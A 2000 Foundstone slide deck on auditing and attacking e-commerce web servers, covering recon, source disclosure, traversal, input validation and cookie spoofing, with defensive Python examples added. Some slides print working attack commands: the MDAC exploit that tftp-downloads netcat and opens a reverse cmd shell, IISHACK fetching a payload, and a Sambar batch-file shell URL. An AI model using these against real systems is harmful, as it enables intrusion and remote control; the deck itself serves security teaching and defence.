audit and security of e-commerce
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
1/93
Copyright 2000 Foundstone, Inc.
Audit and Security of E-Commerce
The attacks are going up the stack.
-
Audit and Security of E-Commerce
Stuart McClure
President/CTO
Foundstone, Inc.
http://www.foundstone.com
949-367-1743
-
Audit and Security of E-Commerce
Background
President/CTO of Foundstone, Inc.
Over 10 years in IT and security
Lead author of Hacking Exposed
Digital Battlefield columnist
InfoWorld Security Watch columnist
Former E&Y Security Consultant
InfoWorld product analyst
-
Overview
eCommerce Primer
Information gathering
Viewing Source
Application design
File System Traversal
Input Validation
Impersonation
-
Ecommerce Primer
"We're secure, we have a firewall."
-
eCommerce Primer
Ecommerce is built on web traffic (TCP port 80), which must be allowed through ecommerce firewalls. Firewalls cannot block most of these attacks.
To hack in this untamed world, knowledge of HTML, DHTML, VBScript, JScript, Java, JavaScript, Perl, CGI, Apache, IIS, Cold Fusion, CyberCash, ADO, MS Access, MDAC, MS SQL Server, and Oracle is helpful and often required.
-
Ecommerce Primer
ASCII Hex values: learn them, know them, live them
Character         Hex   Character     Hex   Character   Hex
Space             20    - (hyphen)    2D    Z           5A
!                 21    . (period)    2E    [           5B
" (quote)         22    /             2F    \           5C
#                 23    0             30    ]           5D
$                 24    9             39    ^           5E
%                 25    :             3A    _           5F
&                 26    ;             3B    `           60
' (apostrophe)    27    <             3C    a           61
(                 28    =             3D    z           7A
)                 29    >             3E    {           7B
*                 2A    ?             3F    |           7C
+                 2B    @             40    }           7D
, (comma)         2C    A             41    ~           7E
-
eCommerce Primer
Most attackers look for the low-hanging fruit first. They scan for web ports, search for vulnerable software or scripts, and then attack.
The more sophisticated attacks require an in-depth knowledge of the inner workings of web scripts (all of which can be learned).
-
Information Gathering
Gather as much information about a site as possible to understand its purpose, function, and most important, its design.
Determine if any low-hanging fruit is available for picking.
-
Information Gathering
Methodology
Web reconnaissance
Vulnerability scanning
Site duplication
Keyword searching
Email addresses
External linkage
Commented code
Key field enumeration
Scripting language enumeration
-
Information Gathering
Web reconnaissance
Enumerate a web server, searching for every web application including alternate management servers, transaction applications, certificate servers, etc.
Port scanning and enumeration will reveal volumes about the target systems.
-
Information Gathering
Web reconnaissance
Port scanning
TCP and UDP ports 1-65535
Common web ports: 80, 81, 88, 443, 2301, 2779, 8000, 8001, 8080, etc.
-
Information Gathering
Web reconnaissance
Port scanning
Network Mapper (nmap) by Fyodor (http://www.insecure.org)
[/opt]# nmap -sT -n -P0 -p 80,88,8000,2799 192.168.51.210
Starting nmap V. 2.12 by Fyodor ([email protected], )
Interesting ports on (192.168.51.210):
Port    State   Protocol   Service
2779    open    tcp        unknown
-
Information Gathering
Web reconnaissance
Port scanning
SuperScan by Robin Keir (www.keir.net)
-
Information Gathering
Web reconnaissance
Enumeration
Web server vendor and version
Web server directory structure
SSL web server vendor and version
Web mind meld
-
Information Gathering
Web reconnaissance
Enumeration
Netcat by Hobbit (http://www.l0pht.com/~weld)
The Swiss Army knife of hackers
TCP (both NT and Unix) and UDP (Unix only)
Raw TCP or UDP connection
Command/shell/program execution
Source routing
Port redirector
Telnet server
Port scanner
-
Information Gathering
Web reconnaissance
Enumeration
Web server vendor and version
Netcat (nc)
[/opt]# nc 192.168.51.210 2779
HEAD / HTTP/1.0

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Sat, 26 Feb 2000 01:06:03 GMT
Content-Length: 3286
Content-Type: text/html
-
Information Gathering
Web reconnaissance
Enumeration
Grinder 1.1 by Rhino9
-
Information Gathering
Web reconnaissance
Enumeration
Hidden redirection
Using HTTP-EQUIV, web sites redirect visitors to other parts of the server or to other servers. An attacker can glean this information and use the new information as targets for an attack.
-
Information Gathering
Web reconnaissance
Enumeration
Netcat (nc) HTTP-EQUIV discovery
C:\>nc www.site.com 80
GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2000 23:21:52 GMT
Server: Microsoft-IIS/5.0
Connection: close
Content-Type: text/html
-
Information Gathering
Web reconnaissance
Enumeration
Secure Sockets Layer (SSL)
Privacy protocol implementing symmetric key cryptography (DES, RC4), authentication (RSA, DSS), and message integrity (MD5, SHA).
Transport Layer Security (TLS) is the latest version of SSL.
OpenSSL/SSLeay
An open source toolkit for implementing SSL and TLS in applications.
-
Information Gathering
Web reconnaissance
Enumeration
OpenSSL/SSLeay
SSLeay> s_client -connect www.ramsec.com:443
CONNECTED(00000003)
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://216.182.36.154/index.html
Date: Sat, 26 Feb 2000 00:59:07 GMT
Last-Modified: Thu, 10 Feb 2000 22:52:52 GMT
read:errno=0
-
Information Gathering
Vulnerability checking
Web vulnerability scanners check for known holes in application files and design.
CGIscan by Bronc Buster (1998)
Sitescan by Rhino9
Whisker by Rain Forest Puppy (1999)
http://www.wiretrip.net/rfp
-
Information Gathering
Vulnerability checking
Whisker (NT and Unix)
-- whisker / v1.3.0a / rain forest puppy / ADM / wiretrip --
- Loaded script database of 1691 lines
= - = - = - = - = - =
= Host: www.hackingexposed.com
= Server: Apache/3.3.3 (Unix)
+ 404 Not Found: GET /cfdocs/
+ 404 Not Found: GET /cfide/Administrator/startstop.html
+ 404 Not Found: GET /cfappman/index.cfm
+ 403 Forbidden: GET /cgi-bin/
+ 404 Not Found: GET /cgi-bin/dbmlparser.exe
+ 404 Not Found: HEAD /cgi-bin/webdist.cgi
+ 404 Not Found: HEAD /cgi-bin/handler
+ 404 Not Found: HEAD /mall_log_files/order.log
+ 404 Not Found: HEAD /PDG_Cart/
+ 404 Not Found: HEAD /quikstore.cfg
+ 404 Not Found: HEAD /orders/
+ 404 Not Found: HEAD /Admin_files/order.log
+ 404 Not Found: HEAD /bigconf.cgi
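A defender-side complement to the Whisker output above, added here as an example (it is not part of the original slides): a small log analyser that flags a client which hits several of the scanner's probe paths with 403/404 responses inside a short window. The log lines are constructed in Apache common log format; the probe prefixes are taken from the scan output above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in Apache/NCSA common log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [26/Feb/2000:01:06:01 +0000] "GET /index.html HTTP/1.0" 200 11731
10.0.0.9 - - [26/Feb/2000:01:06:02 +0000] "GET /cfdocs/ HTTP/1.0" 404 301
10.0.0.9 - - [26/Feb/2000:01:06:02 +0000] "GET /cfide/Administrator/startstop.html HTTP/1.0" 404 301
10.0.0.9 - - [26/Feb/2000:01:06:03 +0000] "GET /cfappman/index.cfm HTTP/1.0" 404 301
10.0.0.9 - - [26/Feb/2000:01:06:03 +0000] "GET /cgi-bin/ HTTP/1.0" 403 295
10.0.0.9 - - [26/Feb/2000:01:06:04 +0000] "GET /cgi-bin/dbmlparser.exe HTTP/1.0" 404 301
10.0.0.9 - - [26/Feb/2000:01:06:04 +0000] "HEAD /cgi-bin/webdist.cgi HTTP/1.0" 404 -
10.0.0.9 - - [26/Feb/2000:01:06:05 +0000] "HEAD /quikstore.cfg HTTP/1.0" 404 -
10.0.0.5 - - [26/Feb/2000:01:06:20 +0000] "GET /about_us.html HTTP/1.0" 200 4200
10.0.0.5 - - [26/Feb/2000:01:06:25 +0000] "GET /missing.html HTTP/1.0" 404 301
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)$')

# Paths a Whisker-style scan probes, taken from the scan output on the slide.
PROBE_PREFIXES = ("/cfdocs/", "/cfide/", "/cfappman/", "/cgi-bin/", "/quikstore.cfg",
                  "/orders/", "/PDG_Cart/", "/mall_log_files/", "/Admin_files/")

def parse_line(line):
    """Parse one common-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts").split()[0], "%d/%b/%Y:%H:%M:%S")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}

def find_scanners(log_text, window=timedelta(seconds=60), threshold=5):
    """Return {ip: [probe paths]} for clients that hit at least `threshold`
    known probe paths with 403/404 responses inside a sliding time window."""
    hits = defaultdict(list)                      # ip -> [(ts, path)]
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["status"] not in (403, 404):
            continue
        if rec["path"].startswith(PROBE_PREFIXES):
            hits[rec["ip"]].append((rec["ts"], rec["path"]))
    flagged = {}
    for ip, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide `start` forward until events[start..end] fit inside `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = [p for _, p in events[start:end + 1]]
                break
    return flagged
```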
-
Information Gathering
Site duplication
Web spider programs
Automatic web retriever and mirroring programs that follow every link, copying readable files such as .HTM, .HTML, .DHTML, .JHTML, .SHTML, .XML, etc.
They do not retrieve .CGI, .ASP, .CFM or dynamically generated pages.
Manual searching
View Source
Save As
-
Information Gathering
Site duplication
Wget
Unix based, GNU Wget 1.5.3
Standard on most Linux distributions or download from http://www.freshmeat.org
Non-interactive network retriever
HTTP and FTP retrieval
Proxy support
Authentication support
Include/exclude list of URLs
-
Information Gathering
Wget
[/opt]# wget -r -m -v www.ramsec.com
--13:33:34--  http://www.ramsec.com:80/
           => `www.ramsec.com/index.html'
Connecting to www.ramsec.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 11,731 [text/html]

    0K -> ..........  .                                        [100%]

13:33:35 (25.57 KB/s) - `www.ramsec.com/index.html' saved [11731/11731]
-
Information Gathering
Site duplication
Teleport Pro 1.29 by Tennyson Maxwell Information Systems, Inc. (http://www.tenmax.com)
Proxy support
Authentication support
Multi-threaded
Advanced filters
-
Information Gathering
Teleport Pro results:
-
Information Gathering
Site duplication
Countermeasures
Garbage.cgi
Rootshell once had an obscure link on their initial page which ran a CGI script that spit out endless amounts of data. This effectively tied up the web pilfering.
-
Information Gathering
Keyword searching
Searching web site code to find hidden treasures such as usernames, passwords, email addresses, external links, external images, etc.
-
Information Gathering
Keyword searching
With wget on Unix:
grep pass *.html
Teleport Pro on NT:
findstr pass *.html
-
Information Gathering
Email addresses
Searching a web site for email addresses can unearth usernames, external relationships, and points of attack.
-
Information Gathering
Email addresses
Wget (offline)
Teleport Pro (offline)
Sam Spade (http://www.samspade.org)
Whois, ping, traceroute, ARIN, SMTP, finger, etc.
Online crawl website function!
BlackWidow by SoftByteLabs.com
-
Information Gathering
Email addresses
wget
[/opt]# grep @ *.html
index.html: For additional information, contact: [email protected]
index.html:HREF="mailto:[email protected]">webmaster@ramsec.com
-
Information Gathering
Email addresses
Teleport Pro
D:\>findstr "@" *.htm?
about_us.html: HREF="mailto:[email protected]">[email protected]&nbsp;
-
Information Gathering
Email addresses
Sam Spade
-
Information Gathering
Email addresses
Black Widow
-
Information Gathering
External linkage
Links to web pages or graphics on systems other than the target.
An external link can imply a relationship of sorts and provide alternate targets for the attacker.
-
Information Gathering
External linkage
Sam Spade
-
Information Gathering
Commented code
Searching for commented code can provide insight into the site's design, such as applications, languages used, programming hints, etc.
-
Information Gathering
Commented code
Manual technique is most effective
-
Information Gathering
Key field enumeration
Learn the name and type of key fields used in dynamic scripts (.CGI, .ASP, .CFM).
http://www.site.com/Login.asp?id=486&fu=http%3A%2F%2Fwww%2ESramsec%2Ecom%2Fdirectory%2FDefault%2Easp&cw=100&sf=0&kv=1&cc=9442568&Oi=1
id, fu, cw, sf, kv, cc, Oi are input fields to the Login.asp script.
-
Information Gathering
Scripting language enumeration
-
Viewing Source
Numerous bugs or poor web designs allow an attacker to view web source code; for example, .ASP or .CGI code can be viewed within the browser.
An attacker can discover internal web design or, worse, internally used usernames and passwords for database access.
-
Viewing Source
Methodology
Active Server Pages (ASP)
Common Gateway Interface (CGI)
ColdFusion Server (CFM)
-
Viewing Source
ASP vulnerabilities
Dot bug
Countermeasures
Upgrade to IIS 4.0 or above
Apply the IIS 3.0 patch:
ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/fesrc-fix
-
Viewing Source
ASP vulnerabilities
Alternate Data Streams bug
Countermeasures
Remove read access on files for the Everyone group
Apply patches
For IIS 3.0:
ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/iis3-datafix/
For IIS 4.0:
ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security
-
Viewing Source
Common Gateway Interface (CGI)
CGI design flaws
CGIs that read and display an HTML file can be tricked into reading themselves and therefore displaying their own contents.
http://www.site.com/index.cgi?page=main.html
Can be changed to:
http://www.site.com/index.cgi?page=index.cgi
-
Viewing Source
ColdFusion Server
By Allaire (www.allaire.com)
Numerous bugs in 4.0 (1999)
Upload a file onto the web server:
http://www.site.com/cfdocs/expeval/openfile.cfm
View a file on the web server with the Expression Evaluator:
http://www.site.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log
-
Viewing Source
ColdFusion Server
Countermeasures
Remove the scripts from the web server
Apply the patch:
http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full
-
File System Traversal
Vulnerabilities and misconfigurations may allow unauthorized access to files and directories on the web server.
-
File System Traversal
Methodology
Dot dot bugs
Dot listings
Tilde usage
Compaq Insight Manager
-
File System Traversal
Dot listings
Web server misconfiguration or vulnerability which allows an attacker to display the current directory's file listing.
For example, Novell's GroupWise Web Gateway web server allows for virtual directory displaying:
http://www.infoworld.com/us/.
-
File System Traversal
Tilde usage
Web server vulnerability allowing an attacker to escape the root directory of the web server and view the contents of a particular user's directory on the system.
For example, this might display the contents of the root user's directory:
http://www.infoworld.com/~root/
-
File System Traversal
Compaq Insight Manager (CIM)
Re-discovered in 1999
CIM web server allowed an attacker to exploit the dot dot command in a browser to download any file on the system.
A good test to determine if a system is vulnerable is to look for C:\BOOT.INI
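Added example, not from the original slides, covering both the CGI page= flaw (index.cgi?page=index.cgi) from the Viewing Source section and the dot-dot and tilde traversals in this section: a resolver that decodes the parameter, re-roots the normalised path under the document root and allow-lists the extension before anything is read. DOC_ROOT, the allowed extensions and the sample inputs are assumptions made for the example.

```python
import os
from urllib.parse import unquote

# Assumed layout for this example: pages live under DOC_ROOT and only these
# extensions may ever be handed back by index.cgi?page=...
DOC_ROOT = "/var/www/pages"
ALLOWED_EXT = {".html", ".htm"}

def resolve_page(param, doc_root=DOC_ROOT):
    """Map a page= parameter to a file path, or None if it must be refused.
    Decode first so %2e%2e and %2f cannot hide a traversal, then re-root the
    normalised path under doc_root and allow-list the extension."""
    name = unquote(param)
    if "%" in name or "\x00" in name:          # still encoded, or NUL truncation
        return None
    name = name.replace("\\", "/")             # treat ..\ the same as ../
    if name.startswith(("/", "~")):            # absolute path or ~user escape
        return None
    root = os.path.normpath(doc_root)
    candidate = os.path.normpath(os.path.join(root, name))
    if os.path.commonpath([root, candidate]) != root:
        return None                            # ../ climbed out of the root
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None                            # refuses index.cgi, boot.ini, ...
    return candidate
```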
-
Input Validation
Web applications can often be tricked into accepting invalid input for processing, making them cough up sensitive information or, worse, crashing the application.
-
Input Validation
Methodology
Metacharacters
Field overflows
Application buffer overflows
Hex character replacement
Server side includes (SSI)
Hidden tags
Server side debugging
Extending Javascript
Data access bypassing
Local command execution
-
Input Validation
Metacharacters
Depending on the input sanitation being performed on the server, it may be possible to submit metacharacters as a parameter and get the server to return unexpected results. For example:
http://www.site.com/login.cgi?..&&&&&&&&&
may actually choke the web server or produce debugging information.
-
Input Validation
Field overflows
Poor field length checking may allow an attacker to submit a large character field, causing unexpected results or sometimes crashing the server (use with caution).
-
Input Validation
Field overflows
Hidden tag SIZE
-
Input Validation
Field overflows
Hidden tag SUBMIT
-
Input Validation
Field overflows
Unexpected results
-
Input Validation
Application buffer overflows
IISHACK
iishack.exe (program containing the buffer overflow and initial instructions to download the ncx.exe file to be executed).
ncx.exe (slim version of Netcat executing a command shell on port 80).
-
Input Validation
Application buffer overflows
IISHACK (how to exploit)
Set up a web server with ncx.exe in the root directory.
Run iishack.exe:
C:\NT\>iishack 192.168.51.1 80 10.1.1.1/ncx.exe
Connect to port 80 on the target:
C:\NT\>nc 192.168.51.1 80
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\>
-
Input Validation
Application buffer overflows
IISHACK countermeasure
Apply the IIS 4.0 patch:
ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/ext-fix/
-
Input Validation
Hex character replacement
Replacing ASCII characters with hexadecimal can bypass some IDSs looking for key strings, and it may bypass initial script parsing for invalid or escape characters such as the back tick (` or %60) and ampersand (& or %26), allowing an attacker to execute commands locally and/or receive back unexpected results.
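Added example (not from the original slides) of the countermeasure this slide implies: canonicalise the parameter, decoding %60, %26 and even double-encoded forms, before checking for metacharacters or field length, so the ASCII hex table from the primer cannot be used to slip past the filter. The META set, the 64-character limit and the sample inputs are assumptions; naive_blocked stands in for a filter that inspects only the raw request string.

```python
from urllib.parse import unquote, parse_qsl

# Shell and script metacharacters; the earlier ASCII table shows what these
# look like once hex-encoded (` = %60, & = %26, ; = %3B, | = %7C, ...).
META = set("`&|;$<>()*?[]{}\\'\"\n\r")

def naive_blocked(raw_query):
    """A filter that only looks at the raw request string: %60 walks past it."""
    return "`" in raw_query or ";" in raw_query

def canonicalize(value, rounds=3):
    """Percent-decode until the string stops changing (bounded), so that
    %2560 -> %60 -> ` is seen as the backtick it really is."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    return value

def check_param(name, value, max_len=64):
    """Validate one parameter after canonicalising it. Returns (ok, reason)."""
    canon = canonicalize(value)
    if len(canon) > max_len:                      # field overflow
        return False, f"{name}: length {len(canon)} exceeds {max_len}"
    bad = sorted(ch for ch in set(canon) if ch in META)
    if bad:
        shown = ", ".join(f"{ch!r} (%{ord(ch):02X})" for ch in bad)
        return False, f"{name}: metacharacters {shown}"
    if "%" in canon:                              # malformed or still-encoded
        return False, f"{name}: unresolved percent sequence"
    return True, "ok"

def check_query(query):
    """Validate every parameter of a raw query string; [] means accepted.
    parse_qsl does the first decode, canonicalize() catches deeper layers."""
    reasons = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        ok, reason = check_param(name, value)
        if not ok:
            reasons.append(reason)
    return reasons
```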
-
Input Validation
Server side includes (SSI)
Allows commands to be executed locally on the system.
For example, on a Unix web server allowing SSIs you can use the following command to mail the /etc/passwd to yourself:
-
Input Validation
Hidden tags
HTML hidden tags are frequently used to store session information such as price, quantity, and purchase item.
These hidden tags can be modified and resubmitted, and if no backend processing is performed, a product can be purchased for a much reduced price (e.g. a BMW for the cost of a matchbox car).
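Added example, not from the original slides: the hidden-field checkout this slide describes beside a hardened version that takes only the item id from the form, looks the price up server-side, bounds the quantity, and reports a mismatching client-supplied price as a tampering signal. The catalog, the quantity limit and the form dictionaries are constructed for the example.

```python
from decimal import Decimal, InvalidOperation

# Constructed catalog: the server, not a hidden form field, is the authority on price.
CATALOG = {
    "bmw-3series": Decimal("32500.00"),
    "matchbox-car": Decimal("1.99"),
}
MAX_QTY = 10

class OrderError(ValueError):
    """Raised when a submitted order must be refused outright."""

def vulnerable_total(form):
    """The pattern the slide warns about: price and quantity come straight from
    hidden <input> fields and are multiplied with no backend check."""
    return Decimal(form["price"]) * int(form["quantity"])

def checkout_total(form):
    """Hardened checkout. Returns (total, tampered): the total is computed from
    the server-side catalog only; `tampered` is True when the client also sent
    a price that does not match, a direct signal of a modified form."""
    item = form.get("item", "")
    if item not in CATALOG:
        raise OrderError(f"unknown item {item!r}")
    try:
        qty = int(form.get("quantity", ""))
    except ValueError:
        raise OrderError("quantity is not an integer") from None
    if not 1 <= qty <= MAX_QTY:
        raise OrderError(f"quantity {qty} outside 1..{MAX_QTY}")
    sent = form.get("price")
    try:
        tampered = sent is not None and Decimal(sent) != CATALOG[item]
    except InvalidOperation:
        tampered = True                  # not even a number: still a modified form
    return CATALOG[item] * qty, tampered

def order_rejected(form):
    """True when checkout_total refuses the form (unknown item, bad quantity)."""
    try:
        checkout_total(form)
        return False
    except OrderError:
        return True
```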
-
Input Validation
Server side debugging
Server side application debugging features may allow additional information to be leaked about the script's function (e.g. http://www.domain.com/cgi-bin/script.cgi?debug=ON, debug=TRUE).
-
Input Validation
Extending Javascript
Sites that allow users to input information onto the site without checking for Javascript content can allow attackers to insert Javascript code to prompt users for sensitive information.
For example, a recent eBay hack was accomplished by inserting Javascript code into the description of an auction item. When users selected the description they were prompted to enter their online userid and password, which was sent to the attacker.
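Added example (not from the original slides) for the auction-description case above: the same user-supplied text rendered raw and rendered with output encoding, plus an input-side marker check that serves only as an alerting signal, since the encoding is the actual control. The injected description is constructed.

```python
import html
import re

# Constructed auction description carrying an injected script of the kind the
# eBay incident on the slide describes.
INJECTED = 'Mint condition! <script>prompt("Re-enter your eBay password")</script>'

def render_unsafe(description):
    """What the vulnerable site did: echo the description straight into the page,
    so the browser executes whatever markup the seller typed."""
    return f"<div class=desc>{description}</div>"

def render_safe(description):
    """Encode on output: <, >, &, ' and " become entities, so a script tag reaches
    the browser as visible text, never as markup."""
    return f"<div class=desc>{html.escape(description, quote=True)}</div>"

# Markers worth alerting on; entity-encoded attempts are unescaped first so
# &lt;script&gt; is inspected as <script>.
SCRIPT_MARKERS = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)

def looks_like_script(description):
    """Signal only: True when the submitted text contains script markers.
    Rendering still goes through render_safe regardless of this result."""
    return bool(SCRIPT_MARKERS.search(html.unescape(description)))
```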
-
Input Validation
Local command execution
Vulnerabilities in the web server, script parameter processing, or rogue files may allow an attacker to execute local commands on the affected systems.
-
Input Validation
Local command execution
MDAC
IIS's MDAC component has a vulnerability where an attacker can submit commands for local execution.
Written by Rain Forest Puppy (RFP)
Exploit and fix can be found at www.wiretrip.net/rfp
-
Input Validation
Local command execution
MDAC detecting vulnerable systems
C:\>nc -nvv -w 2 192.168.51.1 80
GET /msadc/msadcs.dll HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 19 Dec 1999 18:32:10 GMT
Content-Type: application/x-varg
Content-Length: 6
-
Input Validation
Local command execution
MDAC sending the exploit
C:\>mdac.pl -h 192.168.51.1 -t 192.168.51.102 -i 192.168.51.102 -p 44444
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Command:
cmd /c cd %SystemRoot%&&tftp -i 192.168.51.102 GET nc.exe
nc.exe&&del ftptmp && attrib -r nc.exe && PROMPT=hacked $p$g&& nc.exe -e cmd.exe 192.168.51.102 44444
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: Success!
-
Input Validation
Local command execution
MDAC getting the prompt
C:\>nc -l -p 44444
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
hacked C:\WINNT>
-
Input Validation
Local command execution
Sambar CGI vulnerability (2/23/00)
Batch files in cgi-bin allow local command execution
Hello.bat
Echo.bat
-
Input Validation
Local command execution
Sambar hack
http://www.site.com/cgi-bin/hello.bat?&tftp%20
-i%20GET%20nc.exe%20c:\temp\nc.exe&c:\nc.exe
%20-L%20-p%204000%20-e%20cmd.exe
-
Impersonation
Impersonating another web user can be accomplished by understanding the way authentication is performed on the server.
-
Impersonation
Methodology
Determine state tracking
Attempt to reverse engineer the cookie encryption method
Spoof cookies to impersonate a user
-
Impersonation
Determine state tracking
All ecommerce sites must track a user's state in some manner.
TCP (and therefore HTTP) is by its nature stateless, making it difficult to associate web requests to an individual.
The cookie solution.
-
Impersonation
Determine state tracking
Cookies allow a web developer to track and remember a user while shopping by inserting information into the cookie file.
Netscape:
C:\PROGRAM FILES\NETSCAPE\USERS\DEFAULT\COOKIE.TXT
IE:
C:\WINNT\PROFILES\ADMINISTRATOR\COOKIES
-
Impersonation
Determine state tracking
Cookie Pal by Kookaburra Software (http://www.kburra.com/)
-
Impersonation
Determine state tracking
Reverse engineer the cookie state information and you will be able to make purchases as someone else.
Often based on a combination of name/password/date/time/IP address, or some relevant data.
Usually some form of XOR or DES encryption.
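Added example, not from the original slides, of two state-tracking designs that do not rest on the secrecy of an XOR or DES scheme: a cookie whose fields are bound by an HMAC, so that a reverse-engineered format still cannot be altered into another user's session, and an opaque random session id with the state held server-side. The server secret, the TTL and the in-memory store are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
import time

# Constructed server-side secret; a real deployment loads it from protected config.
SERVER_SECRET = secrets.token_bytes(32)

def issue_cookie(user, ttl=3600, now=None, secret=SERVER_SECRET):
    """Signed cookie: user|expiry|HMAC-SHA256(user|expiry).
    The fields are readable by anyone, but changing any of them without the
    secret invalidates the tag, unlike the XOR/DES schemes described above,
    where recovering the format is enough to forge new values."""
    exp = int(now if now is not None else time.time()) + ttl
    payload = f"{user}|{exp}"
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"

def verify_cookie(cookie, now=None, secret=SERVER_SECRET):
    """Return the user name if the cookie is authentic and unexpired, else None."""
    try:
        user, exp, tag = cookie.rsplit("|", 2)
        exp = int(exp)
    except ValueError:
        return None                                  # malformed
    expected = hmac.new(secret, f"{user}|{exp}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):       # constant-time comparison
        return None                                  # tampered or forged
    if (now if now is not None else time.time()) >= exp:
        return None                                  # expired
    return user

# Alternative: opaque session ids. The cookie carries no state at all, so there
# is nothing to reverse engineer; the mapping lives in a server-side store.
SESSIONS = {}

def new_session(user):
    """Create a server-side session and return its unguessable id."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = user
    return sid

def session_user(sid):
    """Look a session id up; unknown ids simply map to no user."""
    return SESSIONS.get(sid)
```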
-
Wrap-up
Overview
Background and Primer
Information gathering
Viewing Source
Application design
File System Traversal
Input Validation
Impersonation